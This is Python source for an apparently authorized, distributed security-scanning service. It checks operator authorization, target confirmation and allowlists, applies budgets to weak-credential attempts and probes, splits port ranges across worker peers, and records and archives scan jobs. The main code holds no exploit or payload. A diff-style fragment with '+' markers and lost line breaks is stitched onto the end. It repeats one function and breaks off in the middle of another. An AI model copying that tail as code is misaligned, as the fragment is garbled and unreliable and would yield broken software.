    if not isinstance(discovery, dict):
        return 50
    try:
        return max(int(discovery.get("max_pages", 50) or 50), 1)
    except (TypeError, ValueError):
        return 50


def _validate_authorization_context(
    owner,
    *,
    target_host: str,
    scan_type: str,
    authorized: bool,
    target_confirmation: str,
    scope_id: str,
    authorization_ref: str,
    engagement_metadata,
    target_allowlist,
    target_config,
):
    """Validate operator-supplied authorization fields for a scan launch.

    Returns ``(context, None)`` with the normalized authorization context on
    success, or ``(None, error_payload)`` when a check fails.
    """
    if not authorized:
        return None, validation_error(
            "Scan authorization required. Confirm you are authorized to scan this target."
        )
    if engagement_metadata is not None and not isinstance(engagement_metadata, dict):
        return None, validation_error("engagement_metadata must be a JSON object when provided")

    host = (target_host or "").strip().lower()
    confirmation = (target_confirmation or "").strip().lower()
    if confirmation and confirmation != host:
        return None, validation_error(
            f"target_confirmation must echo the resolved target host ({host})"
        )

    # Explicit per-launch allowlist wins over the node-level configured one.
    allowlist = _normalize_allowlist(
        target_allowlist or getattr(owner, "cfg_scan_target_allowlist", [])
    )
    if allowlist and not _host_in_allowlist(host, allowlist):
        return None, validation_error(
            f"Target {host} is outside the configured allowlist."
        )

    scope_prefix = _extract_scope_prefix(target_config)
    needs_scope_check = (
        scan_type == ScanType.WEBAPP.value and bool(scope_prefix) and bool(allowlist)
    )
    if needs_scope_check and not _scope_in_allowlist(scope_prefix, allowlist):
        return None, validation_error(
            f"Configured discovery scope {scope_prefix} is outside the configured allowlist."
        )

    context = {
        "target_confirmation": confirmation or host,
        "scope_id": str(scope_id or "").strip(),
        "authorization_ref": str(authorization_ref or "").strip(),
        "engagement_metadata": deepcopy(engagement_metadata) if isinstance(engagement_metadata, dict) else None,
        "target_allowlist": allowlist or None,
    }
    return context, None
def _apply_launch_safety_policy(
    owner,
    *,
    scan_type: str,
    active_peers: list[str],
    nr_local_workers: int,
    scan_min_delay: float,
    max_weak_attempts: int,
    target_config,
    allow_stateful_probes: bool,
    verify_tls: bool,
):
    """Apply per-scan-type safety budgets and produce a safety-policy record.

    Returns the 4-tuple ``(effective_max_weak_attempts, target_config,
    effective_allow_stateful_probes, policy)`` where *policy* records the
    applied budgets plus human-readable warnings.

    Network scans are never capped here — only a concurrency warning may be
    emitted. Webapp (graybox) scans have auth attempts, discovery pages, and
    stateful probes clamped to the configured graybox budgets.
    """
    warnings = []
    policy = {"scan_type": scan_type}
    # Deep-copy so budget clamping below never mutates the caller's config.
    target_config_dict = deepcopy(target_config) if isinstance(target_config, dict) else target_config

    if scan_type == ScanType.NETWORK.value:
        # Effective parallelism = peers x local workers (each at least 1).
        concurrency_budget = max(len(active_peers or []), 1) * max(int(nr_local_workers or 1), 1)
        warning_threshold = max(int(getattr(owner, "cfg_network_concurrency_warning_threshold", 16) or 16), 1)
        policy.update({
            "concurrency_budget": concurrency_budget,
            "recommended_concurrency_budget": warning_threshold,
            "scan_min_delay": scan_min_delay,
        })
        if concurrency_budget > warning_threshold:
            warnings.append(
                f"Requested network concurrency {concurrency_budget} exceeds recommended threshold {warning_threshold}."
            )
        policy["warnings"] = warnings
        # Network scans: requested values pass through unchanged.
        return max_weak_attempts, target_config_dict, allow_stateful_probes, policy

    # Graybox (webapp) scans: clamp requested values to the configured budgets.
    graybox_budgets = get_graybox_budgets_config(owner)
    auth_budget = graybox_budgets["AUTH_ATTEMPTS"]
    discovery_budget = graybox_budgets["ROUTE_DISCOVERY"]
    stateful_budget = graybox_budgets["STATEFUL_ACTIONS"]

    requested_attempts = max(int(max_weak_attempts or 0), 0)
    effective_attempts = min(requested_attempts, auth_budget)
    if requested_attempts > effective_attempts:
        warnings.append(
            f"max_weak_attempts capped from {requested_attempts} to policy budget {effective_attempts}."
        )

    requested_pages = _extract_discovery_max_pages(target_config_dict)
    effective_pages = min(requested_pages, discovery_budget)
    if isinstance(target_config_dict, dict):
        # Write the clamped page budget back into the (copied) config.
        discovery = dict(target_config_dict.get("discovery") or {})
        discovery["max_pages"] = effective_pages
        target_config_dict["discovery"] = discovery
    if requested_pages > effective_pages:
        warnings.append(
            f"discovery.max_pages capped from {requested_pages} to policy budget {effective_pages}."
        )

    # Stateful probes require both operator opt-in and a non-zero budget.
    effective_stateful = bool(allow_stateful_probes and stateful_budget > 0)
    if allow_stateful_probes and not effective_stateful:
        warnings.append("Stateful graybox probes were disabled by policy budget.")
    elif effective_stateful:
        warnings.append("Stateful graybox probes are enabled. Use only for explicitly approved workflows.")

    if not verify_tls:
        warnings.append("TLS verification is disabled for an authenticated scan.")

    policy.update({
        "auth_attempt_budget": auth_budget,
        "effective_auth_attempt_budget": effective_attempts,
        "route_discovery_budget": discovery_budget,
        "effective_route_discovery_budget": effective_pages,
        "stateful_action_budget": stateful_budget,
        "effective_stateful_action_budget": 1 if effective_stateful else 0,
        "warnings": warnings,
    })
    return effective_attempts, target_config_dict, effective_stateful, policy


def parse_exceptions(owner, exceptions):
    """Normalize port-exception input to a list of ints.

    Accepts a list of port-like values (non-digit entries are silently
    dropped) or a free-form string from which digit runs are extracted via
    the owner's ``re`` helper.
    """
    if not exceptions:
        return []
    if isinstance(exceptions, list):
        return [int(x) for x in exceptions if str(x).isdigit()]
    return [int(x) for x in owner.re.findall(r"\d+", str(exceptions)) if x.isdigit()]
def resolve_active_peers(owner, selected_peers):
    """Validate *selected_peers* against configured chainstore peers.

    Returns ``(active_peers, None)`` on success or ``(None, error_payload)``
    when no peers are configured or an unknown peer was requested.
    """
    chainstore_peers = owner.cfg_chainstore_peers
    if not chainstore_peers:
        return None, validation_error("No workers found in chainstore peers configuration.")

    if not selected_peers:
        # No explicit selection: every configured peer participates.
        return chainstore_peers, None

    unknown = [peer for peer in selected_peers if peer not in chainstore_peers]
    if unknown:
        return None, validation_error(
            f"Invalid peer addresses not found in chainstore_peers: {unknown}. "
            f"Available peers: {chainstore_peers}"
        )
    return selected_peers, None


def normalize_common_launch_options(
    owner,
    distribution_strategy,
    port_order,
    run_mode,
    monitor_interval,
    scan_min_delay,
    scan_max_delay,
    nr_local_workers,
):
    """Apply defaults and bounds to launch settings shared by all scan types."""
    # Unknown / empty enum-like strings fall back to the node configuration.
    distribution_strategy = str(distribution_strategy).upper()
    if distribution_strategy not in (DISTRIBUTION_MIRROR, DISTRIBUTION_SLICE):
        distribution_strategy = owner.cfg_distribution_strategy

    port_order = str(port_order).upper()
    if port_order not in (PORT_ORDER_SHUFFLE, PORT_ORDER_SEQUENTIAL):
        port_order = owner.cfg_port_order

    run_mode = str(run_mode).upper()
    if run_mode not in (RUN_MODE_SINGLEPASS, RUN_MODE_CONTINUOUS_MONITORING):
        run_mode = owner.cfg_run_mode
    if monitor_interval <= 0:
        monitor_interval = owner.cfg_monitor_interval

    # Non-positive delays fall back to configuration; keep min <= max.
    if scan_min_delay <= 0:
        scan_min_delay = owner.cfg_scan_min_rnd_delay
    if scan_max_delay <= 0:
        scan_max_delay = owner.cfg_scan_max_rnd_delay
    if scan_min_delay > scan_max_delay:
        scan_min_delay, scan_max_delay = scan_max_delay, scan_min_delay

    workers = int(nr_local_workers)
    if workers <= 0:
        workers = owner.cfg_nr_local_workers
    workers = max(LOCAL_WORKERS_MIN, min(LOCAL_WORKERS_MAX, workers))

    return {
        "distribution_strategy": distribution_strategy,
        "port_order": port_order,
        "run_mode": run_mode,
        "monitor_interval": monitor_interval,
        "scan_min_delay": scan_min_delay,
        "scan_max_delay": scan_max_delay,
        "nr_local_workers": workers,
    }
def build_network_workers(owner, active_peers, start_port, end_port, distribution_strategy):
    """Build per-peer port assignments for a network scan.

    MIRROR gives every peer the full range; otherwise the range is sliced
    into near-equal contiguous chunks (earlier peers absorb the remainder).
    Returns ``(workers, None)`` or ``(None, error_payload)``.
    """
    num_workers = len(active_peers)
    if num_workers == 0:
        return None, validation_error("No workers available for job execution.")

    def _slot(lo, hi):
        # Shared shape for a per-peer assignment record.
        return {"start_port": lo, "end_port": hi, "finished": False, "result": None}

    if distribution_strategy == DISTRIBUTION_MIRROR:
        return {address: _slot(start_port, end_port) for address in active_peers}, None

    total_ports = end_port - start_port + 1
    base, remainder = divmod(total_ports, num_workers)
    workers = {}
    cursor = start_port
    for index, address in enumerate(active_peers):
        size = base + (1 if index < remainder else 0)
        workers[address] = _slot(cursor, cursor + size - 1)
        cursor += size
    return workers, None


def build_webapp_workers(owner, active_peers, target_port):
    """Build per-peer assignments for a webapp scan: every peer mirrors the target port."""
    if not active_peers:
        return None, validation_error("No workers available for job execution.")
    assignment = {
        address: {
            "start_port": target_port,
            "end_port": target_port,
            "finished": False,
            "result": None,
        }
        for address in active_peers
    }
    return assignment, None
def announce_launch(
    owner,
    *,
    target,
    start_port,
    end_port,
    exceptions,
    distribution_strategy,
    port_order,
    excluded_features,
    run_mode,
    monitor_interval,
    scan_min_delay,
    scan_max_delay,
    task_name,
    task_description,
    active_peers,
    workers,
    redact_credentials,
    ics_safe_mode,
    scanner_identity,
    scanner_user_agent,
    created_by_name,
    created_by_id,
    nr_local_workers,
    scan_type,
    target_url,
    official_username,
    official_password,
    regular_username,
    regular_password,
    weak_candidates,
    max_weak_attempts,
    app_routes,
    verify_tls,
    target_config,
    allow_stateful_probes,
    target_confirmation,
    scope_id,
    authorization_ref,
    engagement_metadata,
    target_allowlist,
    safety_policy,
):
    """Persist immutable config, announce job in CStore, and return launch response.

    Sequence (order matters): resolve enabled features; persist the immutable
    job config (with secret handling) to R1FS; build and announce the running
    job record in CStore; best-effort submit a job-start attestation; write an
    audit event; finally return the launch payload including other known jobs.
    Returns an ``{"error": ...}`` payload if the config cannot be persisted.
    """
    excluded_features, enabled_features = resolve_enabled_features(
        owner,
        excluded_features,
        scan_type=scan_type,
    )

    # Fall back to node-configured identity strings when not supplied.
    if not scanner_identity:
        scanner_identity = owner.cfg_scanner_identity
    if not scanner_user_agent:
        scanner_user_agent = owner.cfg_scanner_user_agent

    job_id = owner.uuid(8)
    owner.P(f"Launching {job_id=} {target=} with {exceptions=}")
    owner.P(f"Announcing pentest to workers (instance_id {owner.cfg_instance_id})...")

    # Immutable per-job configuration; persisted once, referenced by CID.
    job_config = JobConfig(
        target=target,
        start_port=start_port,
        end_port=end_port,
        exceptions=exceptions,
        distribution_strategy=distribution_strategy,
        port_order=port_order,
        nr_local_workers=nr_local_workers,
        enabled_features=enabled_features,
        excluded_features=excluded_features,
        run_mode=run_mode,
        scan_min_delay=scan_min_delay,
        scan_max_delay=scan_max_delay,
        ics_safe_mode=ics_safe_mode,
        redact_credentials=redact_credentials,
        scanner_identity=scanner_identity,
        scanner_user_agent=scanner_user_agent,
        task_name=task_name,
        task_description=task_description,
        monitor_interval=monitor_interval,
        selected_peers=active_peers,
        created_by_name=created_by_name or "",
        created_by_id=created_by_id or "",
        # Launch endpoints only reach this point for authorized requests.
        authorized=True,
        target_confirmation=target_confirmation,
        scope_id=scope_id,
        authorization_ref=authorization_ref,
        engagement_metadata=engagement_metadata,
        target_allowlist=target_allowlist,
        safety_policy=safety_policy,
        scan_type=scan_type,
        target_url=target_url,
        official_username=official_username,
        official_password=official_password,
        regular_username=regular_username,
        regular_password=regular_password,
        weak_candidates=weak_candidates,
        max_weak_attempts=max_weak_attempts,
        app_routes=app_routes,
        verify_tls=verify_tls,
        target_config=target_config,
        allow_stateful_probes=allow_stateful_probes,
    )

    persisted_config, job_config_cid = persist_job_config_with_secrets(
        owner,
        job_id=job_id,
        config_dict=job_config.to_dict(),
    )
    if not job_config_cid:
        # Without a config CID workers cannot fetch the job: abort hard.
        owner.P("Failed to store job config in R1FS — aborting launch", color='r')
        return {"error": "Failed to store job config in R1FS"}

    # Shared orchestration record announced in CStore for all workers.
    job_specs = CStoreJobRunning(
        job_id=job_id,
        job_status=JOB_STATUS_RUNNING,
        job_pass=1,
        run_mode=run_mode,
        launcher=owner.ee_addr,
        launcher_alias=owner.ee_id,
        target=target,
        scan_type=scan_type,
        target_url=target_url,
        task_name=task_name,
        start_port=start_port,
        end_port=end_port,
        date_created=owner.time(),
        job_config_cid=job_config_cid,
        workers=workers,
        timeline=[],
        pass_reports=[],
        next_pass_at=None,
        risk_score=0,
    ).to_dict()
    owner._emit_timeline_event(
        job_specs, "created",
        f"Job created by {created_by_name}",
        actor=created_by_name,
        actor_type="user"
    )
    owner._emit_timeline_event(job_specs, "started", "Scan started", actor=owner.ee_id, actor_type="node")

    # Attestation is best-effort: a failure must never block the launch.
    try:
        redmesh_job_start_attestation = owner._submit_redmesh_job_start_attestation(
            job_id=job_id,
            job_specs=job_specs,
            workers=workers,
        )
        if redmesh_job_start_attestation is not None:
            job_specs["redmesh_job_start_attestation"] = redmesh_job_start_attestation
            owner._emit_timeline_event(
                job_specs, "blockchain_submit",
                "Job-start attestation submitted",
                actor_type="system",
                meta={**redmesh_job_start_attestation, "network": owner.REDMESH_ATTESTATION_NETWORK}
            )
    except Exception as exc:
        import traceback
        owner.P(
            f"[ATTESTATION] Failed to submit job-start attestation for job {job_id}: {exc}\n"
            f"  Type: {type(exc).__name__}\n"
            f"  Args: {exc.args}\n"
            f"  Traceback:\n{traceback.format_exc()}",
            color='r'
        )

    # Prefer the owner's write hook (resilience path); fall back to the repo.
    write_job_record = getattr(type(owner), "_write_job_record", None)
    if callable(write_job_record):
        write_job_record(owner, job_id, job_specs, context="launch_test")
    else:
        _job_repo(owner).put_job(job_id, job_specs)

    owner._log_audit_event("scan_launched", {
        "job_id": job_id,
        "target": target,
        "start_port": start_port,
        "end_port": end_port,
        "launcher": owner.ee_addr,
        "enabled_features_count": len(enabled_features),
        "redact_credentials": redact_credentials,
        "ics_safe_mode": ics_safe_mode,
        "scope_id": scope_id,
        "authorization_ref": authorization_ref,
        "has_target_allowlist": bool(target_allowlist),
        "safety_warning_count": len((safety_policy or {}).get("warnings", [])),
    })

    # Include the other known jobs (normalized) in the launch response.
    all_network_jobs = _job_repo(owner).list_jobs()
    report = {}
    for other_key, other_spec in all_network_jobs.items():
        normalized_key, normalized_spec = owner._normalize_job_record(other_key, other_spec)
        if normalized_key and normalized_key != job_id:
            report[normalized_key] = normalized_spec

    owner.P(f"Current jobs:\n{owner.json_dumps(all_network_jobs, indent=2)}")
    return {
        "job_specs": job_specs,
        "worker": owner.ee_addr,
        "other_jobs": report,
        "job_config": persisted_config,
    }
def launch_network_scan(
    owner,
    *,
    target="",
    start_port=1,
    end_port=65535,
    exceptions="64297",
    distribution_strategy="",
    port_order="",
    excluded_features=None,
    run_mode="",
    monitor_interval=0,
    scan_min_delay=0.0,
    scan_max_delay=0.0,
    task_name="",
    task_description="",
    selected_peers=None,
    redact_credentials=True,
    ics_safe_mode=True,
    scanner_identity="",
    scanner_user_agent="",
    authorized=False,
    created_by_name="",
    created_by_id="",
    nr_local_workers=0,
    target_confirmation="",
    scope_id="",
    authorization_ref="",
    engagement_metadata=None,
    target_allowlist=None,
):
    """Launch a network scan using network-specific validation and worker slicing.

    Validates the target/port inputs and authorization context, applies the
    network safety policy, slices the port range across the active peers, and
    announces the job. Returns the launch payload or a validation-error dict.
    """
    if not target:
        return validation_error("target required for network scan")

    # Fix: reject non-numeric ports with a validation error instead of letting
    # ValueError/TypeError propagate to the API layer.
    try:
        start_port = int(start_port)
        end_port = int(end_port)
    except (TypeError, ValueError):
        return validation_error("start_port and end_port must be integers")
    # Fix: enforce the valid TCP port range instead of silently accepting
    # nonsense bounds.
    if not 1 <= start_port <= 65535 or not 1 <= end_port <= 65535:
        return validation_error("start_port and end_port must be in the range 1-65535")
    if start_port > end_port:
        # Fix: equal ports are accepted; the old message wrongly claimed
        # strict "less than".
        return validation_error("start_port must be less than or equal to end_port")

    options = normalize_common_launch_options(
        owner,
        distribution_strategy=distribution_strategy,
        port_order=port_order,
        run_mode=run_mode,
        monitor_interval=monitor_interval,
        scan_min_delay=scan_min_delay,
        scan_max_delay=scan_max_delay,
        nr_local_workers=nr_local_workers,
    )
    active_peers, peer_error = resolve_active_peers(owner, selected_peers)
    if peer_error:
        return peer_error

    authorization_context, auth_error = _validate_authorization_context(
        owner,
        target_host=target,
        scan_type=ScanType.NETWORK.value,
        authorized=authorized,
        target_confirmation=target_confirmation,
        scope_id=scope_id,
        authorization_ref=authorization_ref,
        engagement_metadata=engagement_metadata,
        target_allowlist=target_allowlist,
        target_config=None,
    )
    if auth_error:
        return auth_error

    # Network scans carry no graybox knobs; the safety policy only records
    # the concurrency budget and potential warnings.
    max_weak_attempts, target_config, allow_stateful_probes, safety_policy = _apply_launch_safety_policy(
        owner,
        scan_type=ScanType.NETWORK.value,
        active_peers=active_peers,
        nr_local_workers=options["nr_local_workers"],
        scan_min_delay=options["scan_min_delay"],
        max_weak_attempts=5,
        target_config=None,
        allow_stateful_probes=False,
        verify_tls=True,
    )

    workers, worker_error = build_network_workers(
        owner,
        active_peers,
        start_port,
        end_port,
        options["distribution_strategy"],
    )
    if worker_error:
        return worker_error

    return announce_launch(
        owner,
        target=target,
        start_port=start_port,
        end_port=end_port,
        exceptions=parse_exceptions(owner, exceptions),
        distribution_strategy=options["distribution_strategy"],
        port_order=options["port_order"],
        excluded_features=excluded_features,
        run_mode=options["run_mode"],
        monitor_interval=options["monitor_interval"],
        scan_min_delay=options["scan_min_delay"],
        scan_max_delay=options["scan_max_delay"],
        task_name=task_name,
        task_description=task_description,
        active_peers=active_peers,
        workers=workers,
        redact_credentials=redact_credentials,
        ics_safe_mode=ics_safe_mode,
        scanner_identity=scanner_identity,
        scanner_user_agent=scanner_user_agent,
        created_by_name=created_by_name,
        created_by_id=created_by_id,
        nr_local_workers=options["nr_local_workers"],
        scan_type=ScanType.NETWORK.value,
        target_url="",
        official_username="",
        official_password="",
        regular_username="",
        regular_password="",
        weak_candidates=None,
        max_weak_attempts=5,
        app_routes=None,
        verify_tls=True,
        target_config=None,
        allow_stateful_probes=False,
        target_confirmation=authorization_context["target_confirmation"],
        scope_id=authorization_context["scope_id"],
        authorization_ref=authorization_context["authorization_ref"],
        engagement_metadata=authorization_context["engagement_metadata"],
        target_allowlist=authorization_context["target_allowlist"],
        safety_policy=safety_policy,
    )
def launch_webapp_scan(
    owner,
    *,
    target_url="",
    excluded_features=None,
    run_mode="",
    monitor_interval=0,
    scan_min_delay=0.0,
    scan_max_delay=0.0,
    task_name="",
    task_description="",
    selected_peers=None,
    redact_credentials=True,
    ics_safe_mode=True,
    scanner_identity="",
    scanner_user_agent="",
    authorized=False,
    created_by_name="",
    created_by_id="",
    official_username="",
    official_password="",
    regular_username="",
    regular_password="",
    weak_candidates=None,
    max_weak_attempts=5,
    app_routes=None,
    verify_tls=True,
    target_config=None,
    allow_stateful_probes=False,
    target_confirmation="",
    scope_id="",
    authorization_ref="",
    engagement_metadata=None,
    target_allowlist=None,
):
    """Launch a graybox webapp scan using webapp-specific validation and mirrored worker assignment.

    Requires a valid http/https ``target_url`` and official credentials.
    Every active peer receives the same target host/port (MIRROR strategy,
    single local worker). Graybox budgets are applied before announcing.
    Returns the launch payload or a validation-error dict.
    """
    if not target_url:
        return validation_error("target_url required for webapp scan")
    if not official_username or not official_password:
        return validation_error("official credentials required for webapp scan")

    parsed = urlparse(target_url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return validation_error("target_url must be a valid http/https URL")

    target = parsed.hostname
    # Default port follows the scheme when the URL does not pin one.
    target_port = parsed.port or (443 if parsed.scheme == "https" else 80)

    authorization_context, auth_error = _validate_authorization_context(
        owner,
        target_host=target,
        scan_type=ScanType.WEBAPP.value,
        authorized=authorized,
        target_confirmation=target_confirmation,
        scope_id=scope_id,
        authorization_ref=authorization_ref,
        engagement_metadata=engagement_metadata,
        target_allowlist=target_allowlist,
        target_config=target_config,
    )
    if auth_error:
        return auth_error

    # Webapp scans force MIRROR distribution, sequential order, one local worker.
    options = normalize_common_launch_options(
        owner,
        distribution_strategy=DISTRIBUTION_MIRROR,
        port_order=PORT_ORDER_SEQUENTIAL,
        run_mode=run_mode,
        monitor_interval=monitor_interval,
        scan_min_delay=scan_min_delay,
        scan_max_delay=scan_max_delay,
        nr_local_workers=1,
    )
    active_peers, peer_error = resolve_active_peers(owner, selected_peers)
    if peer_error:
        return peer_error

    # Clamp auth attempts / discovery pages / stateful probes to graybox budgets.
    max_weak_attempts, target_config, allow_stateful_probes, safety_policy = _apply_launch_safety_policy(
        owner,
        scan_type=ScanType.WEBAPP.value,
        active_peers=active_peers,
        nr_local_workers=1,
        scan_min_delay=options["scan_min_delay"],
        max_weak_attempts=max_weak_attempts,
        target_config=target_config,
        allow_stateful_probes=allow_stateful_probes,
        verify_tls=verify_tls,
    )

    workers, worker_error = build_webapp_workers(owner, active_peers, target_port)
    if worker_error:
        return worker_error

    return announce_launch(
        owner,
        target=target,
        start_port=target_port,
        end_port=target_port,
        exceptions=[],
        distribution_strategy=DISTRIBUTION_MIRROR,
        port_order=PORT_ORDER_SEQUENTIAL,
        excluded_features=excluded_features,
        run_mode=options["run_mode"],
        monitor_interval=options["monitor_interval"],
        scan_min_delay=options["scan_min_delay"],
        scan_max_delay=options["scan_max_delay"],
        task_name=task_name,
        task_description=task_description,
        active_peers=active_peers,
        workers=workers,
        redact_credentials=redact_credentials,
        ics_safe_mode=ics_safe_mode,
        scanner_identity=scanner_identity,
        scanner_user_agent=scanner_user_agent,
        created_by_name=created_by_name,
        created_by_id=created_by_id,
        nr_local_workers=1,
        scan_type=ScanType.WEBAPP.value,
        target_url=target_url,
        official_username=official_username,
        official_password=official_password,
        regular_username=regular_username,
        regular_password=regular_password,
        weak_candidates=weak_candidates,
        max_weak_attempts=max_weak_attempts,
        app_routes=app_routes,
        verify_tls=verify_tls,
        target_config=target_config,
        allow_stateful_probes=allow_stateful_probes,
        target_confirmation=authorization_context["target_confirmation"],
        scope_id=authorization_context["scope_id"],
        authorization_ref=authorization_context["authorization_ref"],
        engagement_metadata=authorization_context["engagement_metadata"],
        target_allowlist=authorization_context["target_allowlist"],
        safety_policy=safety_policy,
    )
def launch_test(
    owner,
    *,
    target="",
    start_port=1,
    end_port=65535,
    exceptions="64297",
    distribution_strategy="",
    port_order="",
    excluded_features=None,
    run_mode="",
    monitor_interval=0,
    scan_min_delay=0.0,
    scan_max_delay=0.0,
    task_name="",
    task_description="",
    selected_peers=None,
    redact_credentials=True,
    ics_safe_mode=True,
    scanner_identity="",
    scanner_user_agent="",
    authorized=False,
    created_by_name="",
    created_by_id="",
    nr_local_workers=0,
    scan_type="network",
    target_url="",
    official_username="",
    official_password="",
    regular_username="",
    regular_password="",
    weak_candidates=None,
    max_weak_attempts=5,
    app_routes=None,
    verify_tls=True,
    target_config=None,
    allow_stateful_probes=False,
    target_confirmation="",
    scope_id="",
    authorization_ref="",
    engagement_metadata=None,
    target_allowlist=None,
):
    """Compatibility shim that routes to scan-type-specific launch endpoints."""
    try:
        scan_type_enum = ScanType(scan_type)
    except ValueError:
        return validation_error(f"Invalid scan_type: {scan_type}. Valid: {[e.value for e in ScanType]}")

    # Arguments forwarded verbatim by both scan-type endpoints.
    shared = dict(
        excluded_features=excluded_features,
        run_mode=run_mode,
        monitor_interval=monitor_interval,
        scan_min_delay=scan_min_delay,
        scan_max_delay=scan_max_delay,
        task_name=task_name,
        task_description=task_description,
        selected_peers=selected_peers,
        redact_credentials=redact_credentials,
        ics_safe_mode=ics_safe_mode,
        scanner_identity=scanner_identity,
        scanner_user_agent=scanner_user_agent,
        authorized=authorized,
        created_by_name=created_by_name,
        created_by_id=created_by_id,
        target_confirmation=target_confirmation,
        scope_id=scope_id,
        authorization_ref=authorization_ref,
        engagement_metadata=engagement_metadata,
        target_allowlist=target_allowlist,
    )

    if scan_type_enum == ScanType.WEBAPP:
        return owner.launch_webapp_scan(
            target_url=target_url,
            official_username=official_username,
            official_password=official_password,
            regular_username=regular_username,
            regular_password=regular_password,
            weak_candidates=weak_candidates,
            max_weak_attempts=max_weak_attempts,
            app_routes=app_routes,
            verify_tls=verify_tls,
            target_config=target_config,
            allow_stateful_probes=allow_stateful_probes,
            **shared,
        )

    return owner.launch_network_scan(
        target=target,
        start_port=start_port,
        end_port=end_port,
        exceptions=exceptions,
        distribution_strategy=distribution_strategy,
        port_order=port_order,
        nr_local_workers=nr_local_workers,
        **shared,
    )
def _job_repo(owner):
    """Resolve the job-state repository, honoring an owner-class override hook."""
    hook = getattr(type(owner), "_get_job_state_repository", None)
    return hook(owner) if callable(hook) else JobStateRepository(owner)


def _artifact_repo(owner):
    """Resolve the artifact repository, honoring an owner-class override hook."""
    hook = getattr(type(owner), "_get_artifact_repository", None)
    return hook(owner) if callable(hook) else ArtifactRepository(owner)


def _summarize_archive_passes(passes: list[dict]) -> list[dict]:
    """Project archived pass payloads down to lightweight summary dicts."""
    return [
        {
            "pass_nr": entry.get("pass_nr"),
            "date_started": entry.get("date_started"),
            "date_completed": entry.get("date_completed"),
            "duration": entry.get("duration"),
            "risk_score": entry.get("risk_score", 0),
            "quick_summary": entry.get("quick_summary"),
            "llm_failed": entry.get("llm_failed", False),
            "aggregated_report_cid": entry.get("aggregated_report_cid", ""),
            "worker_count": len(entry.get("worker_reports") or {}),
            "findings_count": len(entry.get("findings") or []),
        }
        for entry in (passes or [])
        if isinstance(entry, dict)  # non-dict entries are silently dropped
    ]


def _paginate_archive_passes(archive: dict, *, summary_only: bool, pass_offset: int, pass_limit: int):
    """Return a shallow copy of *archive* with its pass list windowed.

    Applies offset/limit to ``passes`` (optionally summarizing entries) and
    records the query parameters plus truncation info under ``archive_query``.
    """
    every_pass = list(archive.get("passes", []) or [])
    offset = max(int(pass_offset or 0), 0)
    limit = max(int(pass_limit or 0), 0)

    window = every_pass[offset:]
    if limit > 0:
        window = window[:limit]

    result = dict(archive)
    result["passes"] = _summarize_archive_passes(window) if summary_only else window
    was_truncated = offset > 0 or (limit > 0 and offset + len(window) < len(every_pass))
    result["archive_query"] = {
        "summary_only": bool(summary_only),
        "pass_offset": offset,
        "pass_limit": limit,
        "total_passes": len(every_pass),
        "returned_passes": len(window),
        "truncated": was_truncated,
    }
    return result
def get_job_data(owner, job_id: str):
    """
    Retrieve job data from CStore.

    Finalized/stopped jobs return the lightweight stub as-is. Running jobs keep
    only the most recent pass report references to avoid large response payloads.
    """
    job_specs = owner._get_job_from_cstore(job_id)
    if not job_specs:
        return {
            "job_id": job_id,
            "found": False,
            "message": "Job not found in network store.",
        }

    if job_specs.get("job_cid"):
        # Finalized job: the stub plus archive CID is the whole answer.
        return {"job_id": job_id, "found": True, "job": job_specs}

    # Running job: cap payload size to the five most recent pass references.
    recent = job_specs.get("pass_reports", [])
    if isinstance(recent, list) and len(recent) > 5:
        job_specs["pass_reports"] = recent[-5:]

    if isinstance(job_specs.get("workers"), dict):
        clock = getattr(owner, "time", None)
        now = None
        if callable(clock):
            try:
                now = float(clock())
            except (TypeError, ValueError):
                now = None
        job_specs["workers_reconciled"] = reconcile_job_workers(
            owner,
            job_specs,
            live_payloads=_job_repo(owner).list_live_progress() or {},
            now=now,
        )

    return {"job_id": job_id, "found": True, "job": job_specs}


def get_job_archive(owner, job_id: str, summary_only: bool = False, pass_offset: int = 0, pass_limit: int = 0):
    """
    Retrieve the full archived job payload from R1FS for finalized jobs.
    """
    result = get_job_archive_with_triage(owner, job_id)
    if "archive" not in result:
        return result
    wants_window = summary_only or int(pass_offset or 0) > 0 or int(pass_limit or 0) > 0
    if not wants_window:
        return result
    windowed = dict(result)
    windowed["archive"] = _paginate_archive_passes(
        result["archive"],
        summary_only=summary_only,
        pass_offset=pass_offset,
        pass_limit=pass_limit,
    )
    return windowed
+ """ + result = get_job_archive_with_triage(owner, job_id) + if "archive" not in result: + return result + if summary_only or int(pass_offset or 0) > 0 or int(pass_limit or 0) > 0: + result = dict(result) + result["archive"] = _paginate_archive_passes( + result["archive"], + summary_only=summary_only, + pass_offset=pass_offset, + pass_limit=pass_limit, + ) + return result + + +def get_job_analysis(owner, job_id: str = "", cid: str = "", pass_nr: int = None): + """ + Retrieve stored LLM analysis for a job or pass report CID. + + Finalized jobs are resolved from the archived job payload so analysis remains + available after CStore pruning. Running jobs continue to resolve via live + pass report references in CStore. + """ + if cid: + try: + analysis = owner.r1fs.get_json(cid) + if analysis is None: + return {"error": "Analysis not found", "cid": cid} + return {"cid": cid, "analysis": analysis} + except Exception as e: + return {"error": str(e), "cid": cid} + + if not job_id: + return {"error": "Either job_id or cid must be provided"} + + job_specs = owner._get_job_from_cstore(job_id) + if not job_specs: + return {"error": "Job not found", "job_id": job_id} + + job_status = job_specs.get("job_status") + + if job_specs.get("job_cid"): + archive_result = get_job_archive_with_triage(owner, job_id) + if "archive" not in archive_result: + return { + "error": archive_result.get("error", "archive_unavailable"), + "message": archive_result.get("message"), + "job_id": job_id, + "job_status": job_status, + } + + archive = archive_result["archive"] + passes = archive.get("passes", []) or [] + if not passes: + return {"error": "No pass reports available for this job", "job_id": job_id, "job_status": job_status} + + if pass_nr is not None: + target_pass = next((entry for entry in passes if entry.get("pass_nr") == pass_nr), None) + if not target_pass: + return { + "error": f"Pass {pass_nr} not found in history", + "job_id": job_id, + "available_passes": [entry.get("pass_nr") for 
